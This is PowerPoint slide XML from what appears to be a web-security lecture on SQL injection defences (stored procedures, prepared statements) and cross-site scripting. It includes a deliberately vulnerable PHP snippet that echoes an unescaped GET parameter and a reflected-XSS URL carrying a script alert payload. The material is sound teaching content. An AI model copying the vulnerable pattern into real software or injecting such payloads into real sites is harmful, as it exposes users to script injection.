      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13987881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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SQL Injection Solutions:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stored Procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Now, in the application, instead of string-building SQL, call stored procedure. For examples, in Java:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>CallableStatements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>dbConnection.prepareCall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“{call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getPressRelease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(?)}”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cs.setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(1,Integer.parseInt(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“id”)));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cs.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600370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5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5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5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59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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL Injection Solutions:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Prepared Statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>my_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>my_pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>", ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> =  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt_init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;prepare("SELECT District FROM City WHERE Name=?"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("s", $city); /* type can be “s” = string, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>” = integer … */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;execute(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bind_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>($district); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;fetch();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("%s is in district %s\n", $city, $district); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;close();}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1849534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8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8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80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80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80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80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t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS attacks are used to bypass JavaScript's Same Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reflected attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Stored attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>DOM-based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The JavaScript code on the page takes a string and turns it into code, usually by calling a method such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, Function, or others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89700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9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9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9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9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9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9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9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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$name = $_GET['name']; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8064A2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8064A2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6566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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRP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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20993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5-02-26 at 9.54.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4000" cy="6010970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8320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XSS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latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>');&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRP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p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;Hello &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54475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Requests – Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>User-Agent: curl/7.37.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Host: www.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Accept: */*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1693388"/>
            <a:ext cx="839757"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1350997" y="1693388"/>
            <a:ext cx="387285"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1827633" y="1693388"/>
            <a:ext cx="1919132"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457199" y="2278144"/>
            <a:ext cx="5253015"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57200" y="3439372"/>
            <a:ext cx="2605061"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57199" y="2871181"/>
            <a:ext cx="4649571" cy="468384"/>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785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6 at 10.1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35458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91306825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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reflected Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162243" name="Rectangle 3"/>
          <p:cNvSpPr>
